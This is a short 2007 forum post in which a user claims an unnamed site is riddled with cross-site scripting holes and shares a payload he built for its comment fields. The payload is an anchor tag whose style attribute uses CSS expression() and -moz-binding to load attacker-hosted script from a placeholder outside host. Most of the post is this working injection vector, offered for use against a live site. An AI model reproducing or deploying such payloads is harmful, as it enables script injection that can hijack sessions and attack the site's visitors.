That entire site is absolutely riddled with XSS holes. Any place that allows styled user input (blogs, comments, etc.) allows expression() and -moz-binding.
This vector is what I came up with for comments (Mozilla and IE)...
<a style="x:expression(document.body.firstChild.nextSibling.setAttribute('src','http://yoursite.com/XSS.js'));-moz-binding:url('http://yoursite.com/XSS.xml#xss')"></a>
-Dan
Edited 1 time(s). Last edit at 12/09/2007 02:34PM by DoctorDan.